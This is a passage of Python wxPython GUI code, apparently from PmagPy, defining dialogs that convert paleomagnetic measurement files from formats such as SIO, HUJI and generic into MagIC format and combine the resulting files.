'2g-binary':\n dia = convert_2g_binary_files_to_MagIC(self, self.WD, \"PmagPy 2g-binary file conversion\")\n elif file_type == '2g-ascii':\n dia = convert_2g_ascii_files_to_MagIC(self, self.WD, \"PmagPy 2g-ascii file conversion\")\n elif file_type == 'HUJI':\n dia = convert_HUJI_files_to_MagIC(self, self.WD, \"PmagPy HUJI file conversion\")\n elif file_type == 'LDEO':\n dia = convert_LDEO_files_to_MagIC(self, self.WD, \"PmagPy LDEO file conversion\")\n elif file_type == 'IODP':\n dia = convert_IODP_files_to_MagIC(self, self.WD, \"PmagPy IODP csv conversion\")\n elif file_type == 'PMD':\n dia = convert_PMD_files_to_MagIC(self, self.WD, \"PmagPy PMD 
conversion\")\n elif file_type == 'BGC':\n dia = convert_BGC_files_to_magic(self, self.WD, \"PmagPy BGC conversion\")\n elif file_type == 'TDT':\n tdt_magic.convert(False, self.WD)\n return True\n elif file_type == 'JR6':\n dia = convert_JR6_files_to_MagIC(self, self.WD)\n elif file_type == 'Utrecht':\n dia = convert_Utrecht_files_to_MagIC(self, self.WD, \"PmagPy Utrecht conversion\")\n dia.Center()\n dia.Show()\n\n\n def OnRadioButtonSelect(self, event):\n self.checked_rb = event.GetEventObject()\n\n def on_nextButton(self,event):\n self.Destroy()\n combine_dia = combine_magic_dialog(self.WD, self.parent)\n combine_dia.Show()\n combine_dia.Center()\n\n#--------------------------------------------------------------\n# dialog for combine_magic.py\n#--------------------------------------------------------------\n\n\nclass combine_magic_dialog(wx.Frame):\n \"\"\"\"\"\"\n title = \"Combine magic files\"\n\n def __init__(self, WD, parent):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self) #wx.Panel(self)\n self.parent = parent\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.WD=WD\n self.InitUI()\n\n def InitUI(self):\n pnl = self.panel\n\n #---sizer information ----\n\n TEXT=\"Step 2: \\nCombine different MagIC formatted files to one file named 'measurements.txt'\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl,label=TEXT),wx.ALIGN_LEFT)\n\n\n #---sizer 0 ----\n self.bSizer0 = pw.combine_files(self, \".magic\", DM=3)\n #------------------\n\n self.okButton = wx.Button(self.panel, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.on_okButton, self.okButton)\n\n self.cancelButton = wx.Button(self.panel, wx.ID_CANCEL, '&Cancel')\n self.Bind(wx.EVT_BUTTON, self.on_cancelButton, self.cancelButton)\n self.Bind(wx.EVT_CLOSE, self.on_cancelButton)\n\n self.nextButton = wx.Button(self.panel, id=-1, label='Go to last step')\n self.Bind(wx.EVT_BUTTON, self.on_nextButton, self.nextButton)\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n #\n hboxok = wx.BoxSizer(wx.HORIZONTAL)\n hboxok.Add(self.okButton)\n hboxok.Add(self.cancelButton, flag=wx.LEFT, border=5)\n hboxok.Add(self.nextButton, flag=wx.LEFT, border=5)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT)\n vbox.AddSpacer(10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT)\n vbox.AddSpacer(10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(5)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_cancelButton(self,event):\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n def on_nextButton(self, event):\n combine_dia = combine_everything_dialog(self.WD, self.Parent)\n combine_dia.Show()\n combine_dia.Center()\n self.Destroy()\n\n def on_okButton(self,event):\n os.chdir(self.WD) # make sure OS is working in self.WD (Windows issue)\n files_text=self.bSizer0.file_paths.GetValue()\n files=files_text.strip('\\n').replace(\" \",\"\")\n if files:\n files = files.split('\\n')\n files = [os.path.join(self.WD, f) for f in files]\n COMMAND=\"combine_magic.py -F 
measurements.txt -f %s\"%(\" \".join(files) )\n\n if ipmag.combine_magic(files, 'measurements.txt', data_model=3.0):\n MSG=\"%i files were merged into one MagIC format file:\\n measurements.txt.\\n\\nSee the Terminal/message window for errors\"%(len(files))\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=MSG ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n else:\n pw.simple_warning()\n return\n\n self.on_nextButton(event)\n self.Destroy()\n\n\nclass combine_everything_dialog(wx.Frame):\n \"\"\"\"\"\"\n title = \"Combine MagIC files\"\n\n def __init__(self, WD, parent):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self) #wx.Panel(self)\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.parent = parent\n self.WD=WD\n self.InitUI()\n\n def InitUI(self):\n\n pnl = self.panel\n\n #---sizer information ----\n\n TEXT=\"Step 3: \\nCombine different MagIC formatted files into one file (if necessary). All files should be from the working directory.\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl,label=TEXT),wx.ALIGN_LEFT)\n\n possible_file_dias = ['specimens.txt', 'samples.txt', 'sites.txt', 'locations.txt']\n self.file_dias = []\n all_files = os.listdir(self.WD)\n for dia in possible_file_dias:\n for f in all_files:\n if dia in f:\n bSizer = pw.combine_files(self, dia, DM=3)\n self.file_dias.append(bSizer)\n break\n if not self.file_dias:\n file_string = ', '.join(possible_file_dias)\n MSG = \"You have no more files that can be combined.\\nFile types that can be combined are:\\n{}\\nNote that your file name must end with the file type, i.e.:\\nsomething_something_specimens.txt\".format(file_string)\n dlg = wx.MessageDialog(None,caption=\"Message:\", message=MSG ,style=wx.OK|wx.ICON_INFORMATION)\n dlg.ShowModal()\n dlg.Destroy()\n\n #------------------\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n\n self.okButton = wx.Button(self.panel, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.on_okButton, self.okButton)\n\n self.cancelButton = wx.Button(self.panel, wx.ID_CANCEL, '&Cancel')\n self.Bind(wx.EVT_BUTTON, self.on_cancelButton, self.cancelButton)\n self.Bind(wx.EVT_CLOSE, self.on_cancelButton)\n\n hboxok = wx.BoxSizer(wx.HORIZONTAL)\n hboxok.Add(self.okButton)\n hboxok.Add(self.cancelButton, flag=wx.LEFT, border=5 )\n\n #file_dias = [self.bSizer0, self.bSizer1, self.bSizer2]\n if len(self.file_dias) == 4:\n num_cols, num_rows = 2, 2\n else:\n num_cols = min(len(self.file_dias), 3)\n num_rows = 2 if len(self.file_dias) > 3 else 1\n hboxfiles = wx.GridSizer(num_rows, num_cols, 1, 1)\n hboxfiles.AddMany(self.file_dias)\n\n #hboxfiles = wx.BoxSizer(wx.HORIZONTAL)\n #hboxfiles.AddMany([self.bSizer0, self.bSizer1, self.bSizer2])\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.BOTTOM, border=5)\n vbox.AddSpacer(10)\n vbox.Add(hboxfiles, flag=wx.ALIGN_LEFT)\n vbox.AddSpacer(10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(5)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_cancelButton(self,event):\n self.Parent.Show()\n self.Parent.Raise()\n 
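# restore focus to the parent frame before this window is destroyed\n 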
self.Destroy()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n def on_okButton(self,event):\n os.chdir(self.WD)\n success = True\n new_files = []\n # go through each pw.combine_files sizer, extract the files, try to combine them into one:\n for bSizer in self.file_dias:\n full_list = bSizer.file_paths.GetValue()\n file_name = bSizer.text\n files = full_list.strip('\\n').replace(\" \", \"\")\n if files:\n files = files.split('\\n')\n else:\n print('No files of {} type found, skipping'.format(file_name))\n continue\n res = ipmag.combine_magic(files, file_name, data_model=3.0)\n if res:\n new_files.append(file_name) # add to the list of successfully combined files\n else:\n success = False\n if success:\n new = '\\n' + '\\n'.join(new_files)\n MSG = \"Created new file(s): {} \\nSee Terminal/message window for details and errors\".format(new)\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=MSG ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n else:\n pw.simple_warning()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n\n#--------------------------------------------------------------\n# MagIC generic files conversion\n#--------------------------------------------------------------\n\n\nclass convert_files_to_MagIC(wx.Frame):\n \"\"\"\n Abstract class for file conversion frames\n \"\"\"\n\n def __init__(self, parent, WD, title):\n self.parent = parent\n self.WD = WD\n self.title = title\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self)\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.InitUI()\n\n def InitUI(self):\n pass\n\n def on_cancelButton(self, event):\n self.Destroy()\n self.parent.Show()\n self.parent.Raise()\n\n def on_add_file_button(self, event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n def on_add_dir_button(self, event):\n text = \"choose directory of files to convert to MagIC\"\n pw.on_add_dir_button(self.bSizer0, text)\n\n\nclass convert_generic_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"\"\"\"\n title = \"PmagPy generic file conversion\"\n\n def InitUI(self):\n\n pnl = self.panel\n\n #---sizer infor ----\n\n TEXT = \"convert generic file to MagIC format\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl,label=TEXT),wx.ALIGN_LEFT)\n\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl)\n\n #---sizer 2 ----\n # unique because only accepts 1 experiment type\n TEXT=\"Experiment:\"\n self.bSizer2 = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.HORIZONTAL)\n self.gridBSizer = wx.GridBagSizer(5, 10)\n self.label1 = wx.StaticText(pnl, label=TEXT)\n self.experiments_names=['Demag (AF and/or Thermal)','Paleointensity-IZZI/ZI/ZI','ATRM 6 positions','AARM 6 positions','cooling rate','TRM']\n self.protocol_info = wx.ComboBox(self.panel, -1, self.experiments_names[0], size=(300,25),choices=self.experiments_names, style=wx.CB_READONLY)\n self.gridBSizer.Add(self.label1, (0, 0))\n self.gridBSizer.Add(self.protocol_info, (1, 0))\n self.bSizer2.Add(self.gridBSizer, wx.ALIGN_LEFT)\n #\n self.Bind(wx.EVT_COMBOBOX, self.on_select_protocol, self.protocol_info)\n self.bSizer2a = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), 
wx.HORIZONTAL )\n text = 'Cooling Rate, format is xxx,yyy,zzz with no spaces '\n self.cooling_rate = wx.TextCtrl(pnl)\n self.bSizer2a.AddMany([wx.StaticText(pnl, label=text), self.cooling_rate])\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n # unique because only allows 4 choices (most others have ncn choices)\n self.bSizer4 = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.VERTICAL )\n self.sample_naming_conventions=['sample=specimen','no. of initial characters','no. of terminal characters','character delimited']\n self.sample_naming_convention = wx.ComboBox(self.panel, -1, self.sample_naming_conventions[0], size=(250,25), choices=self.sample_naming_conventions, style=wx.CB_READONLY)\n self.sample_naming_convention_char = wx.TextCtrl(self.panel, id=-1, size=(40,25))\n gridbSizer4 = wx.GridSizer(2, 2, 0, 10)\n gridbSizer4.AddMany( [(wx.StaticText(self.panel,label=\"specimen-sample naming convention\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (wx.StaticText(self.panel,label=\"delimiter/number (if necessary)\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (self.sample_naming_convention,wx.ALIGN_LEFT),\n (self.sample_naming_convention_char,wx.ALIGN_LEFT)])\n #bSizer4.Add(self.sample_specimen_text,wx.ALIGN_LEFT)\n self.bSizer4.AddSpacer(10)\n self.bSizer4.Add(gridbSizer4,wx.ALIGN_LEFT)\n\n #---sizer 5 ----\n self.bSizer5 = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.VERTICAL )\n self.site_naming_conventions=['site=sample','no. of initial characters','no. of terminal characters','character delimited']\n self.site_naming_convention_char = wx.TextCtrl(self.panel, id=-1, size=(40,25))\n self.site_naming_convention = wx.ComboBox(self.panel, -1, self.site_naming_conventions[0], size=(250,25), choices=self.site_naming_conventions, style=wx.CB_READONLY)\n gridbSizer5 = wx.GridSizer(2, 2, 0, 10)\n gridbSizer5.AddMany( [(wx.StaticText(self.panel,label=\"site-sample naming convention\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (wx.StaticText(self.panel,label=\"delimiter/number (if necessary)\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (self.site_naming_convention,wx.ALIGN_LEFT),\n (self.site_naming_convention_char,wx.ALIGN_LEFT)])\n self.bSizer5.AddSpacer(10)\n self.bSizer5.Add(gridbSizer5,wx.ALIGN_LEFT)\n\n #---sizer 6 ----\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n #self.bSizer7 = pw.site_lat_lon(pnl)\n\n #---sizer 8 ----\n self.bSizer8 = pw.replicate_measurements(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer2a, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM, border=5)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(5)\n\n\n self.hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.AddSpacer(20)\n self.hbox_all.Add(vbox)\n 
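# matching 20px spacer on the right, then fit the frame to the assembled sizer\n 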
self.hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(self.hbox_all)\n self.bSizer2a.ShowItems(False)\n self.hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_select_protocol(self, event):\n if self.protocol_info.GetValue() == \"cooling rate\":\n self.bSizer2a.ShowItems(True)\n else:\n self.bSizer2a.ShowItems(False)\n self.hbox_all.Fit(self)\n\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n\n def on_okButton(self,event):\n os.chdir(self.WD)\n # generic_magic.py -WD WD -f FILE -fsa er_samples.txt -F OUTFILE.magic -exp [Demag/PI/ATRM 6/AARM 6/CR] -samp X Y -site X Y -loc LOCNAME -dc B PHI THETA [-A] -WD path\n options = {}\n\n ErrorMessage = \"\"\n #-----------\n if not self.bSizer0.file_path.GetValue():\n pw.simple_warning('You must provide a generic format file')\n return False\n FILE = str(self.bSizer0.file_path.GetValue())\n options['magfile'] = FILE\n\n #-----------\n # WD=\"/\".join(FILE.split(\"/\")[:-1])\n WD=self.WD\n options['dir_path'] = WD\n input_dir = os.path.split(FILE)[0]\n magicoutfile=os.path.split(FILE)[1]+\".magic\"\n options['meas_file'] = magicoutfile\n print(\"magicoutfile\", magicoutfile)\n OUTFILE=os.path.join(self.WD,magicoutfile)\n #-----------\n #OUTFILE=self.WD+\"/\"+FILE.split('/')[-1]+\".magic\"\n #-----------\n EXP = \"\"\n exp = str(self.protocol_info.GetValue())\n if exp == 'Demag (AF and/or Thermal)':\n EXP = 'Demag'\n elif exp == 'Paleointensity-IZZI/ZI/ZI':\n EXP = 'PI'\n elif exp == 'ATRM 6 positions':\n EXP = 'ATRM 6'\n elif exp == 'AARM 6 positions':\n EXP = 'AARM 6'\n elif exp == 'cooling rate':\n cooling = self.cooling_rate.GetValue()\n if not cooling:\n text = \"You must provide cooling rate for this experiment type!\\nThe format is: xxx, yyy,zzz...\\nThis should be cooling rates in [K/minutes], separated by comma, ordered in the same order as XXX.10,XXX.20 ...XX.70\"\n pw.simple_warning(text)\n return False\n EXP = 'CR {}'.format(cooling)\n if 'CR' in EXP:\n options['experiment'], options['cooling_times_list'] = EXP.split()\n elif 'AARM' in EXP:\n options['experiment'] = EXP\n #options['experiment'], options['aarm_n_pos'] = EXP.split()\n elif 'ATRM' in EXP:\n options['experiment'] = EXP\n #options['experiment'], options['atrm_n_pos'] = EXP.split()\n else:\n options['experiment'] = EXP\n #-----------\n SAMP=\"1 0\" #default\n\n samp_naming_convention = str(self.sample_naming_convention.GetValue())\n try:\n samp_naming_convention_char=int(self.sample_naming_convention_char.GetValue())\n except:\n samp_naming_convention_char = \"0\"\n\n if samp_naming_convention == 'sample=specimen':\n SAMP = \"1 0\"\n elif samp_naming_convention == 'no. of initial characters':\n SAMP = \"0 %i\" % int(samp_naming_convention_char)\n elif samp_naming_convention == 'no. of terminal characters':\n SAMP = \"1 %s\" % samp_naming_convention_char\n elif samp_naming_convention == 'character delimited':\n SAMP = \"2 %s\" % samp_naming_convention_char\n\n options['sample_nc'] = SAMP.split()\n #-----------\n\n SITE = \"1 0\" #default\n\n site_naming_convention = str(self.site_naming_convention.GetValue())\n try:\n site_naming_convention_char = int(self.site_naming_convention_char.GetValue())\n except:\n site_naming_convention_char = \"0\"\n\n if site_naming_convention == 'site=sample':\n SITE = \"1 0\"\n elif site_naming_convention == 'no. of initial characters':\n SITE = \"0 %i\" % int(site_naming_convention_char)\n elif site_naming_convention == 'no. of terminal characters':\n SITE = \"1 %s\" % site_naming_convention_char\n elif site_naming_convention == 'character delimited':\n SITE = \"2 %s\" % site_naming_convention_char\n\n options['site_nc'] = SITE.split()\n\n #-----------\n\n LOC = str(self.bSizer6.return_value())\n if LOC!=\"\": options['location'] = LOC\n\n if str(self.bSizer6.return_value()) != \"\":\n LOC=\"-loc \\\"%s\\\"\"%LOC\n else:\n LOC=\"\"\n\n #-----------\n\n LABFIELD=\" \"\n try:\n B_uT, DEC, INC = self.bSizer3.return_value().split()\n except ValueError:\n B_uT, DEC, INC = '0', '0', '0'\n\n #print \"B_uT, DEC, INC\", B_uT, DEC, INC\n options['labfield'], options['labfield_phi'], options['labfield_theta'] = B_uT, DEC, INC\n\n if EXP != \"Demag\":\n LABFIELD=\"-dc \" +B_uT+ \" \" + DEC + \" \" + INC\n\n #-----------\n\n #try: lat,lon = self.bSizer7.return_value().split()\n #except ValueError: lat,lon = '',''\n #options['lat'] = lat\n #options['lon'] = lon\n #lat = '-lat ' + lat\n #lon = '-lon ' + lon\n\n #-----------\n\n DONT_AVERAGE = \" \"\n if not self.bSizer8.return_value():\n DONT_AVERAGE = \"-A\"\n options['noave'] = 1\n else:\n options['noave'] = 0\n\n #-----------\n # some special\n\n SPEC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_specimens.txt\"\n SAMP_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_samples.txt\"\n SITE_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_sites.txt\"\n LOC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_locations.txt\"\n options['spec_file'] = SPEC_OUTFILE\n options['samp_file'] = SAMP_OUTFILE\n options['site_file'] = SITE_OUTFILE\n options['loc_file'] = LOC_OUTFILE\n\n COMMAND=\"generic_magic.py -WD %s -f %s -fsa er_samples.txt -F %s -exp %s -samp %s -site %s %s %s %s -Fsp %s -Fsa %s -Fsi %s -Flo %s \"\\\n %(WD,FILE,OUTFILE,EXP,SAMP,SITE,LOC,LABFIELD,DONT_AVERAGE, SPEC_OUTFILE, SAMP_OUTFILE, SITE_OUTFILE, LOC_OUTFILE)#, lat, lon)\n\n print(\"-I- Running Python command:\\n %s\"%COMMAND)\n program_run, error_message = convert.generic(**options)\n\n if program_run:\n pw.close_window(self, COMMAND, OUTFILE)\n else:\n pw.simple_warning(error_message)\n return False\n\n self.Destroy()\n self.parent.Raise()\n\n #def on_cancelButton(self,event):\n # self.Destroy()\n # self.parent.Raise()\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.generic.__doc__)\n\n def get_sample_name(self, specimen, sample_naming_convention):\n if sample_naming_convention[0] == \"sample=specimen\":\n sample = specimen\n elif sample_naming_convention[0] == \"no. of terminal characters\":\n n = int(sample_naming_convention[1]) * -1\n sample = specimen[:n]\n elif sample_naming_convention[0] == \"character delimited\":\n d = sample_naming_convention[1]\n sample_splitted = specimen.split(d)\n if len(sample_splitted) == 1:\n sample = sample_splitted[0]\n else:\n sample = d.join(sample_splitted[:-1])\n return sample\n\n def get_site_name(self, sample, site_naming_convention):\n if site_naming_convention[0] == \"site=sample\":\n site = sample\n elif site_naming_convention[0] == \"no. of terminal characters\":
of terminal characters\":\n            n = int(site_naming_convention[1])*-1\n            site = sample[:n]\n        elif site_naming_convention[0] == \"character delimited\":\n            d = site_naming_convention[1]\n            site_splitted = sample.split(d)\n            if len(site_splitted) == 1:\n                site = site_splitted[0]\n            else:\n                site = d.join(site_splitted[:-1])\n\n        return site\n\nclass convert_SIO_files_to_MagIC(convert_files_to_MagIC):\n    \"\"\"\n    convert an SIO formatted measurement file to MagIC formatted files\n    \"\"\"\n\n    def InitUI(self):\n        pnl = self.panel\n        TEXT = \"SIO Format file\"\n        bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n        bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n#        bSizer_info.Add(wx.StaticText(self), wx.ALIGN_LEFT)\n\n        self.bSizer0 = pw.choose_file(pnl, method = self.on_add_file_button)\n\n        #---sizer 1 ----\n        self.bSizer1 = pw.labeled_text_field(pnl)\n\n        #---sizer 2 ----\n        self.bSizer2 = pw.experiment_type(pnl)\n\n        #---sizer 3 ----\n        self.bSizer3 = pw.lab_field(pnl)\n\n        #---sizer 4 ----\n        self.bSizer4 = pw.specimen_n(pnl)\n\n        #---sizer 4a ----\n        self.bSizer4a = pw.select_ncn(pnl)\n\n        #---sizer 5 ----\n        TEXT=\"Location name:\"\n        self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n        #---sizer 11 ----\n        #self.bSizer11 = pw.site_lat_lon(pnl)\n\n        #---sizer 6 ---\n        TEXT=\"Instrument name (optional):\"\n        self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n        #---sizer 7 ----\n        self.bSizer7 = pw.replicate_measurements(pnl)\n\n        #---sizer 8 ----\n\n        TEXT = \"peak AF field (mT) if ARM: \"\n        self.bSizer8 = pw.labeled_text_field(pnl, TEXT)\n\n        #---sizer 9 ----\n\n        TEXT = \"Coil number for ASC impulse coil (if treatment units in Volts): \"\n        self.bSizer9 = pw.labeled_text_field(pnl, TEXT)\n\n        #---sizer 10 ---\n        #self.bSizer10 = pw.synthetic(pnl)\n\n        #---sizer 10 ---\n        TEXT = \"cooling rates [K/minutes] (separated by commas) for cooling rate experiment:\"\n        self.bSizer10 = pw.labeled_text_field(pnl, TEXT)\n\n        #---buttons ----\n        hboxok = pw.btn_panel(self, pnl)\n\n        #------\n        vbox=wx.BoxSizer(wx.VERTICAL)\n        hbox0 = wx.BoxSizer(wx.HORIZONTAL)\n        hbox0.Add(self.bSizer5, flag=wx.ALIGN_LEFT)\n        #hbox0.Add(self.bSizer11, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n        hbox0.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n        hbox1 =wx.BoxSizer(wx.HORIZONTAL)\n        hbox1.Add(self.bSizer8, flag=wx.ALIGN_LEFT)\n        hbox1.Add(self.bSizer9, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n        hbox2 =wx.BoxSizer(wx.HORIZONTAL)\n        hbox2.Add(self.bSizer10, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n\n        vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n        vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n        vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n        vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n        vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n        vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n        vbox.Add(self.bSizer4a, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n        vbox.Add(hbox0, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n        vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n        vbox.Add(hbox1, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n        vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n        vbox.Add(hbox2, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n        vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n        vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n        vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n        vbox.AddSpacer(20)\n\n        hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n        hbox_all.AddSpacer(20)\n        hbox_all.Add(vbox)\n        hbox_all.AddSpacer(20)\n\n        self.panel.SetSizer(hbox_all)\n        self.panel.SetScrollbars(20, 20, 50, 50)\n        
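# A minimal, self-contained sketch of the lab-field handling that the SIO
# on_okButton below performs: the pw.lab_field widget returns a single
# "B_uT DEC INC" string, which the handler splits into the labfield/phi/theta
# keyword arguments; a blank string means no lab field. The helper name
# parse_lab_field is my own, for illustration; it is not part of pmag_gui.
def parse_lab_field(value):
    """Split a 'B_uT DEC INC' string into (labfield, phi, theta).

    A blank or whitespace-only string maps to (0, 0, 0), mirroring the
    SIO dialog code below."""
    if not value.strip():
        return 0, 0, 0
    b_ut, dec, inc = value.split()
    return b_ut, dec, inc

# example: parse_lab_field("40 0 -90") returns ('40', '0', '-90')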
hbox_all.Fit(self)\n        self.Centre()\n        self.Show()\n\n\n    def on_okButton(self, event):\n        os.chdir(self.WD)\n        options_dict = {}\n        SIO_file = self.bSizer0.return_value()\n        if not SIO_file:\n            pw.simple_warning('You must provide an SIO format file')\n            return False\n        options_dict['mag_file'] = str(SIO_file)\n        magicoutfile=os.path.split(SIO_file)[1]+\".magic\"\n        outfile = os.path.join(self.WD, magicoutfile)\n        options_dict['meas_file'] = str(outfile)\n        user = self.bSizer1.return_value()\n        options_dict['user'] = str(user)\n        if user:\n            user = \"-usr \" + user\n        experiment_type = self.bSizer2.return_value()\n        options_dict['codelist'] = str(experiment_type)\n        if experiment_type:\n            experiment_type = \"-LP \" + experiment_type\n        lab_field = self.bSizer3.return_value()\n        if not lab_field.strip():\n            lab_field = \"\"\n            options_dict['labfield'] = 0\n            options_dict['phi'] = 0\n            options_dict['theta'] = 0\n        else:\n            lab_field_list = str(lab_field).split()\n            options_dict['labfield'] = lab_field_list[0]\n            options_dict['phi'] = lab_field_list[1]\n            options_dict['theta'] = lab_field_list[2]\n            lab_field = \"-dc \" + lab_field\n        spc = self.bSizer4.return_value()\n        options_dict['specnum'] = spc\n        ncn = self.bSizer4a.return_value()\n        options_dict['samp_con'] = ncn\n        loc_name = self.bSizer5.return_value()\n        options_dict['location'] = str(loc_name)\n        if loc_name:\n            loc_name = \"-loc \" + loc_name\n        instrument = self.bSizer6.return_value()\n        